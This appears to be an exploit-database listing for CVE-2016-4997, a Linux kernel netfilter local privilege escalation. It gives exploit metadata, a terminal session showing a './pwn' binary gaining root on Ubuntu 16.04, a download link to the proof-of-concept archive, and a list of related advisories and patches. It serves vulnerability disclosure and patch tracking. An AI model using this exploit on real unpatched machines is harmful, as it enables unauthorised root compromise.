Lucene search
Qian Zhang1337DAY-ID-25468HistoryOct 10, 2016 - 12:00 a.m.
Linux kernel 4.6.2 - IP6T_SO_SET_REPLACE Privilege Escalation
2016-10-1000:00:00
Qian Zhang
0day.today
58
Exploit for linux platform in category local exploits
# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call
# Date: 2016.10.8
# Exploit Author: Qian [email protected] Qihoo 360
# Version: Linux kernel <= 4.6.2
# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic
# CVE: CVE-2016-4997
# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10
# Contact: [email protected]
#DESCRIPTION
#===========
#The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,
#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE$ ls
compile.sh enjoy enjoy.c pwn pwn.c version.h
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables
[sudo] password for zhang_q:
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn
pwn begin, let the bullets fly . . .
and wait for a minute . . .
pwn over, let's enjoy!
preparing payload . . .
trigger modified tty_release . . .
got root, enjoy :)
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE#
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl
Static hostname: ubuntu
Icon name: computer-vm
Chassis: vm
Machine ID: 355cdf4ce8a048288640c2aa933c018f
Virtualization: vmware
Operating System: Ubuntu 16.04.1 LTS
Kernel: Linux 4.4.0-21-generic
Architecture: x86-64
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE#
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40489.zip
# 0day.today [2018-04-08] #Related
prion
prion
Memory corruption
2016-07-03 21:59:00
cve
cve
CVE-2016-4997
2016-07-03 21:59:16
exploitdb
exploitdb
redhatcve
redhatcve
CVE-2016-4997
2016-06-27 06:49:15
veracode
veracode
Denial Of Service (DoS)
2019-05-02 05:49:27
zdt
zdt
Linux Kernel 4.6.3 Netfilter Privilege Escalation Vulnerability
2016-09-27 00:00:00
Linux Kernel 4.6.3 Netfilter Privilege Escalation Exploit
2016-11-24 00:00:00
packetstorm
packetstorm
Linux Kernel 4.6.3 Netfilter Privilege Escalation
2016-11-23 00:00:00
Linux Kernel 4.6.3 Netfilter Privilege Escalation
2016-09-27 00:00:00
exploitpack
exploitpack
ubuntucve
ubuntucve
CVE-2016-4997
2016-06-24 00:00:00
debiancve
debiancve
CVE-2016-4997
2016-07-03 21:59:16
nvd
nvd
CVE-2016-4997
2016-07-03 21:59:16
cvelist
cvelist
CVE-2016-4997
2016-07-03 21:00:00
suse
suse
Security update for the Linux Kernel (important)
2016-06-30 21:09:07
Security update for Linux Kernel Live Patch 14 for SLE 12 (important)
2016-10-27 01:06:43
Security update for Linux Kernel Live Patch 10 for SLE 12 (important)
2016-10-26 03:06:29
nessus
nessus
SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2636-1) (Dirty COW)
2016-10-26 00:00:00
SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2633-1) (Dirty COW)
2016-10-26 00:00:00
SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2659-1) (Dirty COW)
2016-10-27 00:00:00
ubuntu
ubuntu
Linux kernel regression
2017-06-29 00:00:00
Linux kernel vulnerabilities
2017-06-21 00:00:00
Linux kernel (Wily HWE) vulnerabilities
2016-06-27 00:00:00
openvas
openvas
SUSE: Security Advisory (SUSE-SU-2016:2655-1)
2021-04-19 00:00:00
Ubuntu: Security Advisory (USN-3338-2)
2022-08-26 00:00:00
Ubuntu: Security Advisory (USN-3338-1)
2022-08-26 00:00:00
oraclelinux
oraclelinux
Unbreakable Enterprise kernel security update
2016-09-22 00:00:00
Unbreakable Enterprise kernel security update
2016-09-22 00:00:00
Unbreakable Enterprise kernel security update
2016-09-22 00:00:00
metasploit
metasploit
Linux Kernel 4.6.3 Netfilter Privilege Escalation
2016-11-18 18:52:09
redhat
redhat
(RHSA-2016:1883) Important: kernel-rt security and bug fix update
2016-09-14 14:42:27
(RHSA-2016:1847) Important: kernel security, bug fix, and enhancement update
2016-09-14 14:34:54
(RHSA-2016:1875) Important: kernel-rt security and bug fix update
2016-09-14 14:34:58
amazon
amazon
Medium: kernel
2016-06-24 22:21:00
fedora
fedora
[SECURITY] Fedora 22 Update: kernel-4.4.14-200.fc22
2016-07-19 07:20:52
[SECURITY] Fedora 24 Update: kernel-4.6.3-300.fc24
2016-06-30 21:30:47
ibm
ibm
Security Bulletin: Vulnerabilities in the Linux kernel affect PowerKVM
2018-06-18 01:34:02
centos
centos
kernel, perf, python security update
2016-09-19 15:43:06
mageia
mageia
Updated kernel-linus packages fix security vulnerabilities
2016-08-31 18:32:33
Updated kernel-tmb packages fix security vulnerabilities
2016-08-31 18:32:33
Updated kernel packages fix security vulnerability
2016-07-31 23:39:13
cloudfoundry
cloudfoundry
USN 3020-1 Linux kernel (Vivid HWE) vulnerabilities | Cloud Foundry
2016-07-01 00:00:00
debian
debian
[SECURITY] [DSA 3607-1] linux security update
2016-06-28 09:56:48
[SECURITY] [DSA 3607-1] linux security update
2016-06-28 09:56:48
osv
osv
linux - security update
2016-06-28 00:00:00
Related for 1337DAY-ID-25468